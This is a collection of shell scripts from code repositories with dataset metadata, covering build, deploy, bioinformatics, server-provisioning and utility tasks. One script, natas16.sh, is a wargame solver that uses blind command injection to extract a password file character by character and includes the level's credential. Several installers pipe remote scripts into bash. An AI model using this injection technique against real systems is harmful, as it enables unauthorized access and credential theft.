_srcpath='src/github.com/hashicorp/vault-ssh-helper'
prepare () {
# Symlink the extracted tarball into the GOPATH-style layout (only once).
if [[ ! -r ${_srcpath} ]] ; then
mkdir -p "$(dirname "${_srcpath}")"
ln -s "$(pwd)/${pkgname}-${pkgver}" "${_srcpath}"
fi
export GOPATH="${srcdir}:$(pwd)"
cd "${_srcpath}"
# Fetch build dependencies and run any code-generation steps.
make updatedeps NAME=${pkgname}
go generate ./...
}
build () {
export GOPATH="${srcdir}:$(pwd)"
cd "${_srcpath}"
go build -v -o "${srcdir}/vault-ssh-helper"
}
package () {
# Install the binary and its README into the package tree.
install -Dm755 "${srcdir}/vault-ssh-helper" \
"${pkgdir}/usr/bin/vault-ssh-helper"
install -Dm644 "${pkgname}-${pkgver}/README.md" \
"${pkgdir}/usr/share/doc/${pkgname}/README.md"
}
| true
|
7eaa8786be7c752300f33acb60dc516aab178fdb
|
Shell
|
angular-hispano/angular
|
/aio/scripts/deploy-to-firebase.test.sh
|
UTF-8
| 3,358
| 3.265625
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
set +x -eu -o pipefail
readonly deployToFirebaseDryRun="`dirname $0`/deploy-to-firebase.sh --dry-run"
# check ACTUAL EXPECTED -- compare two strings; on match print "Pass" and
# exit 0, otherwise print both values and exit 1.  Each caller runs it
# inside a ( ... ) subshell, so the exit only ends that test case.
#
# Fix: the right-hand side of [[ == ]] is now quoted.  Unquoted, it is
# treated as a glob pattern, so an expected string containing `*` or `?`
# would pattern-match instead of comparing literally.
function check {
  if [[ $1 == "$2" ]]; then
    echo Pass
    exit 0
  fi
  echo Fail
  echo ---- Expected ----
  echo "$2"
  echo ---- Actual ----
  echo "$1"
  exit 1
}
# Each test case below runs in its own ( ... ) subshell because check exits
# on both success and failure; the subshell keeps the next case running.
# Case: non-angular repo name must skip the deploy.
(
echo ===== master - skip deploy - not angular
actual=$(
export BASH_ENV=/dev/null
export CI_REPO_OWNER=angular
export CI_REPO_NAME=notangular
$deployToFirebaseDryRun
)
expected="Skipping deploy because this is not angular/angular."
check "$actual" "$expected"
)
# Case: a fork (different owner) must skip the deploy.
(
echo ===== master - skip deploy - angular fork
actual=$(
export BASH_ENV=/dev/null
export CI_REPO_OWNER=notangular
export CI_REPO_NAME=angular
$deployToFirebaseDryRun
)
expected="Skipping deploy because this is not angular/angular."
check "$actual" "$expected"
)
# Case: pull-request builds must never deploy.
(
echo ===== master - skip deploy - pull request
actual=$(
export BASH_ENV=/dev/null
export CI_REPO_OWNER=angular
export CI_REPO_NAME=angular
export CI_PULL_REQUEST=true
$deployToFirebaseDryRun
)
expected="Skipping deploy because this is a PR build."
check "$actual" "$expected"
)
# Case: master at the remote HEAD commit deploys to the "next" staging site.
(
echo ===== master - deploy success
actual=$(
export BASH_ENV=/dev/null
export CI_REPO_OWNER=angular
export CI_REPO_NAME=angular
export CI_PULL_REQUEST=false
export CI_BRANCH=master
export CI_COMMIT=$(git ls-remote origin master | cut -c1-40)
export CI_SECRET_AIO_DEPLOY_FIREBASE_TOKEN=XXXXX
$deployToFirebaseDryRun
)
expected="Git branch : master
Build/deploy mode : next
Firebase project : angular-hispano-staging
Firebase site : angular-hispano-docs-staging
Deployment URL : https://angular-hispano-docs-staging.web.app/"
check "$actual" "$expected"
)
# Case: master with a stale commit (not remote HEAD) must skip.
(
echo ===== master - skip deploy - commit not HEAD
actual=$(
export BASH_ENV=/dev/null
export CI_REPO_OWNER=angular
export CI_REPO_NAME=angular
export CI_PULL_REQUEST=false
export CI_BRANCH=master
export CI_COMMIT=DUMMY_TEST_COMMIT
$deployToFirebaseDryRun
)
expected="Skipping deploy because DUMMY_TEST_COMMIT is not the latest commit ($(git ls-remote origin master | cut -c1-40))."
check "$actual" "$expected"
)
# Case: the stable branch at remote HEAD deploys to the production site.
(
echo ===== stable - deploy success
actual=$(
export BASH_ENV=/dev/null
export CI_REPO_OWNER=angular
export CI_REPO_NAME=angular
export CI_PULL_REQUEST=false
export CI_BRANCH=4.3.x
export CI_STABLE_BRANCH=4.3.x
export CI_COMMIT=$(git ls-remote origin 4.3.x | cut -c1-40)
export CI_SECRET_AIO_DEPLOY_FIREBASE_TOKEN=XXXXX
$deployToFirebaseDryRun
)
expected="Git branch : 4.3.x
Build/deploy mode : stable
Firebase project : angular-latino
Firebase site : angular-hispano-docs-prod
Deployment URL : https://docs.angular.lat/"
check "$actual" "$expected"
)
# Case: the stable branch with a stale commit must skip.
(
echo ===== stable - skip deploy - commit not HEAD
actual=$(
export BASH_ENV=/dev/null
export CI_REPO_OWNER=angular
export CI_REPO_NAME=angular
export CI_PULL_REQUEST=false
export CI_BRANCH=4.3.x
export CI_STABLE_BRANCH=4.3.x
export CI_COMMIT=DUMMY_TEST_COMMIT
$deployToFirebaseDryRun
)
expected="Skipping deploy because DUMMY_TEST_COMMIT is not the latest commit ($(git ls-remote origin 4.3.x | cut -c1-40))."
check "$actual" "$expected"
)
| true
|
b730eab588b68e3859503975402ddd90ae1b1eb2
|
Shell
|
SNL-GMS/GMS-PI7-OPEN
|
/docker-tree/centos7/openjdk9/nifi/scripts/nifi_health_check.sh
|
UTF-8
| 1,263
| 4.0625
| 4
|
[
"LicenseRef-scancode-free-unknown",
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
set -x
#
# Description: Validates all clustered NiFi nodes are connected then exit
#
# Usage: ./nifi_health_check.sh [NIFI_PROTOCOL] [NIFI_HOST] [NIFI_PORT]
# Exit status: 0 when the UI is reachable, the cluster API returns JSON,
# and every node reports CONNECTED; 1 otherwise.
#
# Fix: every variable expansion inside [ ] is now quoted (and positional
# parameters are defaulted to empty), so empty or space-containing values
# can no longer make `test` misparse its arguments.

# HTTP or HTTPS
NIFI_PROTOCOL=${1:-}
# Hostname of NiFi node
NIFI_HOST=${2:-}
# Nifi WebUI Port
NIFI_PORT=${3:-}

# Validate parameters are passed in
if [ -z "${NIFI_PROTOCOL}" ] || [ -z "${NIFI_HOST}" ] || [ -z "${NIFI_PORT}" ]; then
  echo "Usage ./nifi_health_check.sh [NIFI_PROTOCOL] [NIFI_HOST] [NIFI_PORT]"
  exit 1
fi

# Get the InitialHTTP Response from NiFi
response=$(curl -k --write-out %{http_code} --silent --output /dev/null "${NIFI_PROTOCOL}://${NIFI_HOST}:${NIFI_PORT}")

# Wait for NiFi UI to be reachable
if [ "$response" -ne 200 ]; then
  exit 1
fi

# Get the initial NiFi Cluster API return (status reflects the jq parse)
resp_type=$(curl -sk -X GET "${NIFI_PROTOCOL}://${NIFI_HOST}:${NIFI_PORT}/nifi-api/controller/cluster" | jq type 2> /dev/null)
ret_code=$?

# Wait for NiFI Cluster API to return JSON
if [ "$ret_code" -ne 0 ]; then
  exit 1
fi

# Check for Unconnected Nodes
unconnected_node_count=$(curl -sk -X GET "${NIFI_PROTOCOL}://${NIFI_HOST}:${NIFI_PORT}/nifi-api/controller/cluster" | jq ".cluster.nodes[].status" | grep -v 'CONNECTED' | wc -l | tr -d ' ')

# Wait for all nodes to be connected
if [ "$unconnected_node_count" -ne 0 ]; then
  exit 1
fi

# Finished
exit 0
| true
|
11a99a46de360b5a409dc61f12c6cc442a9fb621
|
Shell
|
lenik/stack
|
/plover/repr/plover-restful/j
|
UTF-8
| 61
| 2.609375
| 3
|
[] |
no_license
|
#!/bin/bash
# Demo of a bash subtlety: redirecting a compound command into a process
# substitution.  The `a=4` below runs in a *separate process* spawned for
# `>( ... )`, so it can never modify this shell's `a`.
a=1
if true; then
a=3
fi > >( a=4 )
# Prints "3": the assignment inside the process substitution was isolated.
echo $a
| true
|
2b6a3e7581bb50bb4daa13908ea11a2a9939146e
|
Shell
|
chowie/dotfiles
|
/bin/mtapp2
|
UTF-8
| 914
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/bash
# mtapp2 <app> [local] -- multitail today's Laravel log for <app>, split into
# an ERROR pane and an INFO/DEBUG/... pane.  With "local" the log is read
# from the local /var/www tree; otherwise it is tailed over ssh from the
# boedevphplx host.
APP=$1
DATE=`date +%Y-%m-%d`
LOGFILE="${APP}-${DATE}.log"
REMOTE_DIR=/usr/local2/applogs/laravel
LOCAL_DIR=/var/www/${APP}/storage/logs
# Regexes selecting which log levels go to which multitail pane.
LOGLEVELS_TOP='ERROR'
LOGLEVELS_BOTTOM='INFO|DEBUG|LOGIN|NOTICE|WARNING'
if [ "$2" == "local" ]
then
FULL_LOGFILE="${LOCAL_DIR}/${LOGFILE}"
else
FULL_LOGFILE="${REMOTE_DIR}/${LOGFILE}"
fi
#multitail \
#-cS php -e 'ERROR' -l "tail -f -n 30 ${FULL_LOGFILE}" \
#-cS php -e 'DEBUG|LOGIN|NOTICE|WARNING' -l "tail -f -n 30 ${FULL_LOGFILE}"
if [ "$2" == "local" ]
then
multitail \
-cS php -e ${LOGLEVELS_TOP} -l "tail -f -n 30 ${FULL_LOGFILE}" \
-cS php -e ${LOGLEVELS_BOTTOM} -l "tail -f -n 30 ${FULL_LOGFILE}"
else
multitail \
-cS php -e ${LOGLEVELS_TOP} -l "ssh boedevphplx 'tail -f -n 30 ${FULL_LOGFILE}'" \
-cS php -e ${LOGLEVELS_BOTTOM} -l "ssh boedevphplx 'tail -f -n 30 ${FULL_LOGFILE}'"
fi
| true
|
a1806fe887258be83d94946cc8050411cb03ca13
|
Shell
|
YasinEnigma/Scripts
|
/install-dart.sh
|
UTF-8
| 730
| 2.671875
| 3
|
[] |
no_license
|
# Install the Dart SDK on a Debian/Ubuntu system from Google's apt repo.
# Requires sudo and network access.
# Update package repo listings
sudo apt-get update
# Enable access to repos using the HTTPS protocol
sudo apt-get install apt-transport-https
# Add Google linux sign in key to allow Dart repo registry
sudo sh -c 'curl https://dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add -'
# Register Dart repo (release version)
sudo sh -c 'curl https://storage.googleapis.com/download.dartlang.org/linux/debian/dart_stable.list > /etc/apt/sources.list.d/dart_stable.list'
# or Register Dart repo (dev version)
# sudo sh -c 'curl https://storage.googleapis.com/download.dartlang.org/linux/debian/dart_unstable.list > /etc/apt/sources.list.d/dart_unstable.list'
# Install Dart SDK
sudo apt-get update
sudo apt-get install dart
| true
|
3b3c8c8502e5bb16ec392f6043d5b1bf9d17b838
|
Shell
|
MEHColeman/empty_rails_project
|
/bin/create
|
UTF-8
| 1,779
| 2.78125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# Bootstrap an empty Rails project: install gems, generate a fresh Rails app,
# wire up RSpec + SimpleCov + Guard + Bullet, then re-initialise git.
# Exit if any subcommand fails
set -e
# Set up Ruby dependencies and Rails
bundle update
bundle exec rails new --force .
# Create new, blank README template
mv README.md.template README.md
# append extra onto the rails-generated gitignore
cat gitignore.dotfile >> .gitignore
cat Gemfile.append >> Gemfile
# Create RSpec framework
bundle exec rails generate rspec:install
# Prepend SimpleCov bootstrapping to spec_helper.rb (build in /tmp, then swap).
cat << EOF > /tmp/newfile.rb
begin
require 'simplecov'
SimpleCov.start
rescue LoadError
# simplecov not installed. That's OK.
end
EOF
cat spec/spec_helper.rb >> /tmp/newfile.rb
mv /tmp/newfile.rb spec/spec_helper.rb
# Create Guard install
bundle exec guard init
bundle exec guard init rspec
# Bullet config for development.
# NOTE(review): the original comment said "Append", but `>` OVERWRITES
# config/environments/development.rb, and the heredoc is not wrapped in a
# Rails.application.configure block -- confirm this is intentional.
cat << EOF > config/environments/development.rb
config.after_initialize do
Bullet.enable = true
Bullet.sentry = true
Bullet.alert = true
Bullet.bullet_logger = true
Bullet.console = true
Bullet.growl = true
Bullet.xmpp = { :account => 'bullets_account@jabber.org',
:password => 'bullets_password_for_jabber',
:receiver => 'your_account@jabber.org',
:show_online_status => true }
Bullet.rails_logger = true
Bullet.honeybadger = true
Bullet.bugsnag = true
Bullet.airbrake = true
Bullet.rollbar = true
Bullet.add_footer = true
Bullet.skip_html_injection = false
Bullet.stacktrace_includes = [ 'your_gem', 'your_middleware' ]
Bullet.stacktrace_excludes = [ 'their_gem', 'their_middleware', ['my_file.rb', 'my_method'], ['my_file.rb', 16..20] ]
Bullet.slack = { webhook_url: 'http://some.slack.url', channel: '#default', username: 'notifier' }
end
EOF
# Tidy up generated code
rubocop --auto-correct . || true
# Replace this project's git with a new, clean repo
rm -rf ./.git
git init
git add .
git commit -m 'Initial commit'
| true
|
a5baf78cbbc047a3dfb0c8c216d0ce128bddbe1f
|
Shell
|
adeben1/killifish-aging-brain
|
/RNA_diferenciales/STAR_mapear_lecturas_RNAseq.sh
|
UTF-8
| 1,186
| 3.234375
| 3
|
[] |
no_license
|
#!/bin/bash
# Map RNA-seq reads with STAR on a SLURM cluster, staging data on scratch.
#
# Instructions:
# 1. Create a folder run/ containing folders whose names are descriptive of each sample.
# 2. Each sub-folder must contain one/two (single/paired end) fq.gz.
# 3. Resulting files will appear in each of these sub-folders.
#
# Fixes vs. the previous revision:
#  * #SBATCH directives are parsed by sbatch before the script runs, must
#    precede the first executable line, and cannot expand shell variables --
#    `#SBATCH -n $threads` after `threads=6` was silently ignored.  The core
#    count is now hard-coded in the directive block.
#  * STAR was given `--readFilesIn 1.fq 2.fq` but 2.fq is never staged (the
#    paired-end copy is commented out), which made STAR fail; single-end now.
#  * Results are moved to the absolute $dest (we have cd'ed into $SCRATCH,
#    so the relative $folder pointed at the wrong place; $dest was computed
#    but unused).
#SBATCH -J STAR
#SBATCH -N 1
#SBATCH -n 6
threads=6

## Change manually
indexDirectory=/home/areyes/notFur
gtf_path=/home/ska/jtena/genomes/Nfu_20150522.genes_20140630.gtf

## Don't change (except cores)
SCRATCH=/scratch/areyes_$SLURM_JOB_ID
mkdir -p "$SCRATCH" || exit $?
mkdir "$SCRATCH/starIndex"
mkdir "$SCRATCH/results"

wd=$PWD
folder=$1
namePrefix=${folder##*/}

cp "$indexDirectory"/* "$SCRATCH/starIndex/"
# $file1 is intentionally unquoted below so the glob expands.
file1=$folder/*.fq.gz
#file2=$folder/*_2.fq.gz
cp $file1 "$SCRATCH/1.fq.gz"
#cp $file2 $SCRATCH/2.fq.gz
cp "$gtf_path" "$SCRATCH/model.gtf"
cd "$SCRATCH"
gunzip *.fq.gz

#Add if this option if no strand specific and wanna use cufflinks
#--outSAMstrandField intronMotif
# Single-end input: only 1.fq exists (the second read file is commented out
# above), so only one file is passed to --readFilesIn.
STAR --genomeDir ./starIndex --outSAMtype BAM SortedByCoordinate --sjdbGTFfile model.gtf --runThreadN 10 --readFilesIn 1.fq --outFileNamePrefix results/$namePrefix --quantMode GeneCounts

# Copy results back to the sample folder using the absolute path.
dest=${wd}/${folder}
mv results/* "$dest"
rm -rf "$SCRATCH"
| true
|
e7128a8916e1ff6c874bbd993b2fcf3ed242ca5d
|
Shell
|
hvolschenk/git-gt
|
/lib/de/gt-de.sh
|
UTF-8
| 296
| 3.359375
| 3
|
[
"Apache-2.0"
] |
permissive
|
# gt de <branch...> -- delete one or more local git branches.
# Expects the sourcing script to define `variables` (the positional args)
# and `flagForceDelete`; uses `git branch -D` (force) when the flag is true.
deleteString='-d'

if [ -z "${variables[0]:-}" ]; then
  echo 'Please select a branch to delete: gt de <...branch>'
  exit 1;
fi

if [ "${flagForceDelete:-}" = true ]; then
  deleteString='-D'
fi

# Quoting fix: branch names and the flag are now quoted so values are never
# word-split or glob-expanded (a branch like `feature/x y` previously broke).
for deleteBranch in "${variables[@]}"; do
  git branch "$deleteString" "$deleteBranch"
done

unset -v deleteString
| true
|
0a936e78062868f96e94eee119be7e0f423817ef
|
Shell
|
squareweave/dockerized-drupal-composer
|
/8.4/fpm/node/app/scripts/at-boot.sh
|
UTF-8
| 1,092
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/bash -e
# Container boot script for a Drupal site: applies optional PHP memory limit,
# sets filesystem permissions (hardened unless DEVELOPMENT_MODE=true),
# optionally installs the New Relic agent, waits for the DB, then execs Apache.
#
# Fixes vs. the previous revision:
#  * `[ -n $VAR ]` with an unset VAR collapses to `[ -n ]`, which is ALWAYS
#    true, so both optional sections ran unconditionally.  The tests are now
#    quoted with a :- default.
#  * `: ${DEVELOPMENT_MODE:-false}` evaluated the default but never stored
#    it; `:=` actually assigns "false" when the variable is unset/empty.

if [ -n "${MEMORY_LIMIT:-}" ]
then
    echo "Setting PHP memory limit to ${MEMORY_LIMIT}"
    echo "memory_limit = ${MEMORY_LIMIT}" > /usr/local/etc/php/conf.d/resources.ini
fi

: "${DEVELOPMENT_MODE:=false}"
if [ "$DEVELOPMENT_MODE" == "true" ]
then
    echo "!!! RUNNING IN DEVELOPMENT MODE -- PERMISSIONS WILL NOT BE HARDENED !!!"
    chown -R www-data:www-data /app/web/sites/default/files /app/config/sync
    chmod -R =rw,+X /app/web/sites/default/files /app/config/sync
    /app/scripts/at-deploy.sh
    /app/scripts/after-deploy.sh
else
    # Hardened: everything read-only except the public files directory.
    chown -R www-data:www-data /app/web
    chmod -R =r,+X /app/web
    chmod -R =rw,+X /app/web/sites/default/files
fi

if [ -n "${NR_INSTALL_KEY:-}" ]
then
    /usr/bin/newrelic-install install
    sed -i "s/newrelic.appname = \"PHP Application\"/newrelic.appname = \"${NR_APP_NAME}\"/" \
        /usr/local/etc/php/conf.d/newrelic.ini
fi

# Wait for the DB to settle
dockerize -wait tcp://${DB_HOST:-db}:${DB_PORT:-3306} -timeout 60s -template /etc/ssmtp/ssmtp.conf.tmpl:/etc/ssmtp/ssmtp.conf

# Stop. Apache time.
exec "apache2-foreground"
| true
|
1fdaa0296621d8c79e7021c00664e4d29caf7623
|
Shell
|
parayiv/noStarch
|
/16_unrm.sh
|
UTF-8
| 2,442
| 4.46875
| 4
|
[] |
no_license
|
#!/bin/sh
# unrm - Searches the deleted files archive for the specified file or directory.
# If there is more than one matching result, shows a list of the results,
# ordered by timestamp, and lets the user specify which one to restore.
#
# Fix: the multi-match branch tested `-ge 1`, which is always true once the
# zero-match case above has exited, so the single-match fast path (the else
# branch) was dead code.  It now correctly tests `-gt 1`.

mydir="$HOME/.deleted-files"
realrm="/bin/rm.old"
move="/bin/mv"
dest=$(pwd)

if [ ! -d $mydir ]; then
  echo "$0: No deleted files directory: nothing to unremove." >&2; exit 1
fi

cd $mydir

if [ $# -eq 0 ] ; then # No args specified, just show listing
  echo "Contents of your deleted files archive (sorted by date): "
  # Strip the five leading "NN." timestamp fields from each archived name.
  ls -FC | sed -e 's/\([[:digit:]][[:digit:]]\.\)\{5\}//g' -e 's/^/ /'
  exit 0
fi

# Otherwise we must have a user-specified pattern to work with. Let's see if
# the pattern matches more than one file or directory in the archive.
matches="$(ls "$1"* 2> /dev/null | wc -l )"

if [ $matches -eq 0 ]; then
  echo "No match for \"$1\" in the deleted file archive." >&2
  exit 1
fi

if [ $matches -gt 1 ]; then
  echo "More than one file or directory match in the archive: "
  index=1
  for name in $(ls -td "$1"*); do
    # The first 14 characters encode the deletion timestamp (SS.MM.HH.DD.MM).
    datetime="$(echo $name | cut -c1-14 | \
    awk -F. '{ print $5"/"$4" at "$3":"$2":"$1 }')"
    if [ -d $name ]; then
      size="$(ls $name | wc -l | sed 's/[^[:digit:]]//g')"
      echo " $index) $1 (contents = ${size} items, deleted = $datetime)"
    else
      size="$(ls -sdk1 $name | awk '{print $1}')"
      echo " $index) $1 (size = ${size}Kb, deleted = $datetime)"
    fi
    index=$(( $index + 1))
  done
  echo
  echo -n "Which version of $1 do you want to restore ('0' to quit)? [1] : "
  read desired
  if [ ${desired:=1} -ge $index ] ; then
    echo "$0: Restore canceled by user: index value too big." >&2
    exit 1
  fi
  if [ $desired -lt 1 ] ; then
    echo "$0: restore canceled by user." >&2 ; exit 1
  fi
  # Pick the Nth newest match.
  restore="$(ls -td1 "$1"* | sed -n "${desired}p")"
  if [ -e "$dest/$1" ] ; then
    echo "\"$1\" already exists in this directory. Cannot overwrite." >&2
    exit 1
  fi
  echo -n "Restoring file \"$1\" ..."
  $move "$restore" "$dest/$1"
  echo "done."
  echo -n "Delete the additional copies of this file? [y] "
  read answer
  if [ ${answer:=y} = "y" ] ; then
    $realrm -rf *"$1"
    echo "deleted."
  else
    echo "additional copies retained."
  fi
else
  # Exactly one match: restore it without prompting for a choice.
  if [ -e "$dest/$1" ] ; then
    echo "\"$1\" already exists in this directory. Cannot overwrite." >&2
    exit 1
  fi
  restore="$(ls -d *"$1")"
  echo -n "Restoring file \"$1\" ... "
  $move "$restore" "$dest/$1"
  echo "done."
fi

exit 0
| true
|
972661d9d8c3bc117ef8824f843218f1eeb0b565
|
Shell
|
BloodyMods/ServerStarter
|
/src/main/resources/startserver.sh
|
UTF-8
| 1,775
| 3.890625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Launch (downloading first if needed) the ServerStarter jar for a modded
# Minecraft server, optionally putting the world save on a tmpfs RAM disk.

# `-d64` option was removed in Java 10, this handles these versions accordingly
JAVA_FLAGS=""
if (( $(java -version 2>&1 | head -1 | cut -d'"' -f2 | sed '/^1\./s///' | cut -d'.' -f1) < 10 )); then
    JAVA_FLAGS="-d64"
fi

# When the config says "ramDisk: yes", move the save dir aside and mount a
# 2G tmpfs in its place; restore_ramdisk undoes this after the server exits.
DO_RAMDISK=0
if [[ $(cat server-setup-config.yaml | grep 'ramDisk:' | awk 'BEGIN {FS=":"}{print $2}') =~ "yes" ]]; then
    SAVE_DIR=$(cat server.properties | grep 'level-name' | awk 'BEGIN {FS="="}{print $2}')
    mv "$SAVE_DIR" "${SAVE_DIR}_backup"
    mkdir "$SAVE_DIR"
    sudo mount -t tmpfs -o size=2G tmpfs "$SAVE_DIR"
    DO_RAMDISK=1
fi

# Tear the RAM disk down and put the on-disk save back.
# (Extracted to a function: the original duplicated this block verbatim.)
restore_ramdisk() {
    if [[ $DO_RAMDISK -eq 1 ]]; then
        sudo umount "$SAVE_DIR"
        rm -rf "$SAVE_DIR"
        mv "${SAVE_DIR}_backup" "$SAVE_DIR"
    fi
}

if [ -f serverstarter-@@serverstarter-libVersion@@.jar ]; then
    echo "Skipping download. Using existing serverstarter-@@serverstarter-libVersion@@.jar"
    java $JAVA_FLAGS -jar serverstarter-@@serverstarter-libVersion@@.jar
    restore_ramdisk
    exit 0
else
    export URL="https://github.com/BloodyMods/ServerStarter/releases/download/v@@serverstarter-libVersion@@/serverstarter-@@serverstarter-libVersion@@.jar"
fi

echo $URL

# Prefer wget, fall back to curl.  `command -v` replaces the original
# `which ...; if [ $? -eq 0 ]` pattern.
if command -v wget > /dev/null; then
    echo "DEBUG: (wget) Downloading ${URL}"
    wget -O serverstarter-@@serverstarter-libVersion@@.jar "${URL}"
elif command -v curl > /dev/null; then
    echo "DEBUG: (curl) Downloading ${URL}"
    curl -o serverstarter-@@serverstarter-libVersion@@.jar -L "${URL}"
else
    echo "Neither wget or curl were found on your system. Please install one and try again"
fi

java $JAVA_FLAGS -jar serverstarter-@@serverstarter-libVersion@@.jar
restore_ramdisk
| true
|
24afe12d7c1eb65bf03ff8737cb843b102152fac
|
Shell
|
DiegoBMarin/agendapp-front
|
/aggendAppScript.sh
|
UTF-8
| 369
| 2.546875
| 3
|
[] |
no_license
|
#!/bin/bash
# Provision an Ubuntu/Debian server for the AgendApp front-end: replace any
# existing Node.js with Node 14.x from NodeSource, then install pm2 and nginx.
echo "settings server"
echo "Purging Nodejs"
sudo apt purge nodejs -y
sudo apt autoremove -y
echo "install curl"
sudo apt-get install curl -y
echo "install Node JS"
# NodeSource setup script registers the Node 14.x apt repository.
curl -sL https://deb.nodesource.com/setup_14.x | sudo -E bash -
sudo apt-get install nodejs -y
echo "install pm2"
sudo npm install pm2 -g
echo "install nginx"
sudo apt install nginx -y
| true
|
3a2491bb0d51dafff09131972bdc24345ba4c317
|
Shell
|
easaemad14/otw_wargames
|
/natas/natas16.sh
|
UTF-8
| 767
| 3.59375
| 4
|
[] |
no_license
|
#!/bin/bash
# OverTheWire natas16 solver: blind command injection through the level's
# "needle" search parameter.  We inject `$(grep ^<prefix><char> <passfile>)`
# after a word that IS in the dictionary; when grep matches, its output is
# appended to the needle, the search then finds nothing, and our test word
# disappears from the response -- revealing that <prefix><char> is correct.
PASSWORD=""
TMP_FILE="temp.log"
TEST_STR="hackers"
OPTS="-s -u natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh"
DATA='needle='
PASS_FILE='/etc/natas_webpass/natas17'
URL="natas16.natas.labs.overthewire.org"
# We can probably assume the password is 32 bytes long
# This is the length of the rest of our passwords
for i in {1..32}
do
# Try every alphanumeric character as the next password byte.
for c in {{a..z},{A..Z},{0..9}}
do
# Append the output of our injected command to our test string
curl $OPTS --data-urlencode "$DATA$TEST_STR\$(grep ^$PASSWORD$c $PASS_FILE)" $URL > $TMP_FILE
# If our test string exists in the dictionary, it was not a match
if grep -q $TEST_STR $TMP_FILE
then
continue
else
PASSWORD=$PASSWORD$c
break
fi
done
done
rm $TMP_FILE
echo "Password: $PASSWORD"
exit 0
| true
|
ffd06c624999c61a6fc1d36d5d63194d47c75767
|
Shell
|
kordless/stackmonkey
|
/openstack_provision.sh
|
UTF-8
| 1,555
| 3.3125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Vagrant provisioner: installs a Chef server plus Rackspace OpenStack
# cookbooks inside the VM, then prints next-step instructions for the user.
# disable that stupid locale error
sed '/SendEnv LANG LC_*/d' /etc/ssh/ssh_config > /tmp/ssh_config.tmp
cp /tmp/ssh_config.tmp /etc/ssh/ssh_config
# install git and curl
apt-get -y install git;
apt-get -y install curl;
# checkout scripts again to the chef server and copy config file over
git clone https://github.com/kordless/stackmonkey.git /root/bluechipstack/;
cp /vagrant/setuprc /root/bluechipstack/;
# install chef server
cat /root/bluechipstack/openstack_chef_server.sh | bash;
# generate a key (empty passphrase) for pushing to nodes
ssh-keygen -N "" -f /root/.ssh/id_rsa
# add path for knife
echo "export PATH=$PATH:/opt/chef-server/bin/" >> /root/.bashrc
# patch up the /etc/hosts file that chef chews all over
sed '1,2d' /etc/hosts > /tmp/hosts
echo '10.0.2.15 chef-server precise64' >> /tmp/hosts
echo '127.0.0.1 localhost' >> /tmp/hosts
cp /tmp/hosts /etc/hosts
# now install rackspace cookbooks (requires changes to /etc/hosts above)
curl -s -L https://raw.github.com/rcbops/support-tools/master/chef-install/install-cookbooks.sh | bash;
# shout out to the user
echo "=========================================================="
echo "Vagrant Chef server provisioning is complete."
echo;
echo "Type the following to continue:"
echo "1. 'vagrant ssh' to connect to the Chef server."
echo "2. 'sudo su' to become root on the Chef server."
echo "3. 'cd /root/bluechipstack/' to change directories."
echo "4. './openstack_install.sh' to resume install."
echo "=========================================================="
echo;
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.